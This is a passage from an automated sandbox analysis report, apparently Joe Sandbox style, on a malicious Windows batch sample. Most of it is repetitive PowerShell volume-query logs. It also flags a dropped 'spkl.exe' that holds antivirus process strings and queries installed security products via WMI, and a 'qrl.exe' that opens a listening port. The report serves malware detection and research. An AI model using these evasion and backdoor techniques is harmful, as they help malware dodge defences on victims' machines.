Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Queries volume information: \Device\CdRom0\ VolumeInformation

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0337D280 GetLocalTime,

56_2_0337D280

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe

Code function: 56_2_0337611A GetVersion,

56_2_0337611A

Source: C:\Users\user\AppData\Local\Temp\183942631522663\[space]= .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: spkl.exe, 00000038.00000002.2755859416.0000000007720000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: der\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntivirusProduct

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

71_2_003752B0

Windows Analysis Report
D0WmCTD2qO.bat

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1523869
Product:	CloudBasic
Start time:	06:10:11
Start date:	02.10.2024
Sample:	D0WmCTD2qO.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	6777134e2627894ed689d8357973acc7
SHA1:	cd0fab81cecb98eb8b5c5530cf291e9c6e854453
SHA256:	500329d1eeead6e6b7b1570f637138e91f0e28a4febeae208631db98750312ee

Windows Analysis Report D0WmCTD2qO.bat

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
D0WmCTD2qO.bat